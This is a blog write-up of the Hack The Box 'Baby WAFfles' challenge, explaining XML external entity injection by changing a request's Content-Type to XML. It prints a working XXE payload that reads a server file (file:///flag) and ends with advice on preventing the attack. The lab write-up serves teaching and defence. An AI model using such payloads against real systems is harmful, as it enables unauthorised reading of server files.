top of page
Search

Hack the box OWASP Top 10: Baby WAFfles

  • carocsteads
  • Feb 23, 2025
  • 2 min read

Updated: Dec 9, 2025

Baby WAFfles order:

Synopsis:  XML external entity injection by modifying Content-Type header.

Skills Required:

  1. Basic understanding of XXE.

  2. Ability to analyze and implement an XXE injection attack that retrieves an arbitrary file from the server's filesystem.

  3. Basic understanding of XML.

Skills Learned:

  1. Understanding the XXE vulnerability.

  2. Familiarity with the process of exploiting XXE vulnerability.

  3. Experience in analyzing and understanding Burp messages to inject a payload.


The exercise: Our WAFfles and ice scream are out of this world, come to our online WAFfles house and check out our super secure ordering system API!





Analysis:

The first clue is in the exercise description. XML external entity injection by modifying Content-Type header.

Next the confirmation of the clue is in the tab name



XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.

In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other back-end infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.


Let's use Burp. Submit a WAFfle order to the table 33 and send it to repeater.



Go to header and change application/json for application/xml, replace the json expression for the following


<!-- ?xml version="1.0" encoding="UTF-8"? -->

<!DOCTYPE replace[<!ENTITY xxe SYSTEM "file:///flag">]>

<order>

<table_num>

1

</table_num>

<food>

&xxe;

</food>

</order>


The XML document defines an external entity (localFile) that references a local file "file:///flag". Then the &xxe entity is included in the food element.

Let's send the request message with the xxe payload and the flag is presented.




How to prevent XXE via Content-Type Manipulation:

  • Disable XML parsing when unnecessary

If your application does not require XML processing, disable XML handling entirely to eliminate the attack vector.

Configure web servers and APIs to reject XML Content-Types unless explicitly needed.

  • Use secure XML parsers that prevent External Entity Expansion

Use safe XML libraries that disable DTD processing and external entity expansion (e.g., defusedxml in Python, XMLInputFactory with IS_SUPPORTING_EXTERNAL_ENTITIES set to false in Java).

Explicitly disable features like DOCTYPE and ENTITY declarations in the XML parser.

  • Validate and sanitize all incoming Content-Type headers

Enforce a strict allowlist of accepted content types (e.g., application/json instead of text/xml).

Reject or log suspicious or malformed content-type headers to detect manipulation attempts.

Use a Web Application Firewall (WAF) to block known XXE attack patterns.

Recent Posts

See All
Automating Privileged Access Management:

A QA Engineer's Journey with Apache Guacamole By Carolina Steadham  | QA Automation Engineer Introduction In today's cybersecurity landscape, privileged access management (PAM) is critical for protect

 
 
 
🔧 Self-Healing Locators

Transform Flaky Tests into Resilient Automation By Carolina Steadham | QA Automation Engineer 📚 About This Project The Selenium TestNG Automation Framework is a comprehensive learning platform desi

 
 
 

Comments

© 2023 by Carolina Steadham. All rights reserved.

bottom of page